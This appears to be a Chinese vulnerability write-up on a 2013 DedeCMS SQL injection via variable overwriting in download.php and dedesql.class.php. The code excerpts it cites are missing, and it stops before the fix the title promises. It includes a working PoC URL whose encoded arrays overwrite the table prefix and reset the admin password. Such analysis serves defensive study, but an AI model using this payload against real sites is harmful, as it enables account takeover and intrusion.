[高危]DedeCMS最新SQL注入漏洞分析及修复方法

存在漏洞页面：/plus/download.php

漏洞发生页面：/include/dedesql.class.php

发现时间：2013-06-20

漏洞类型：SQL注入

所属建站程序：DedeCMS

所属服务器类型：通用

所属编程语言：PHP

漏洞描述：目标网站由于存在变量覆盖漏洞，可以传入恶意字符串带入SQL语句，导致SQL注入。

漏洞危害：可被攻击者构造恶意SQL语句，重置管理员密码，写入webshell等，进而获取服务器权限。

漏洞原理：

首先说一下dedecms不安全的参数处理机制，这里我们看一下/include/common.inc.php代码的第106行：

万恶之源其实就在这里，基本上目前dede被发现的漏洞全都死在这里。我们可以看到，程序从GPC数组中取出名值对后，只是对$_v做了简单的addslashes处理，就直接赋给了${$_k}，实现了类似全局变量覆盖的机制，设计的初衷是为了开发方便，但却存在着严重的安全问题。PHP在经历了这么多年的更新换代终于修补了register_globals问题，但是dede的这段代码使php付出的努力全部白费。

下面我们回归漏洞。

首先是/include/dedesql.class.php的第595-607行，

在执行这段代码之前，程序未初始化$arrs1和$arrs2这两个数组。结合前面提到的dede不安全的参数处理机制，利用这段代码我们可以覆盖任意全局变量。例如在这个漏洞中，我们可以控制$GLOBALS[‘cfg_dbprefix’]的值。

然后，我们来看一下如何利用$GLOBALS[‘cfg_dbprefix’]。

这里在/include/dedesql.class.php的第512行SetQuery函数中，代码如下

这里因为$GLOBALS[‘cfg_dbprefix’]是可控的，进而$prefix也是可控的，所以在这儿就造成了SQL注入。

下面跟踪一下整个漏洞的触发过程，这是网上已经公开的PoC：

http://localhost/dedecms5.7/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=116&arrs2[]=101&arrs2[]=115&arrs2[]=116&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35

这里跟入dedesql.class.php代码，如图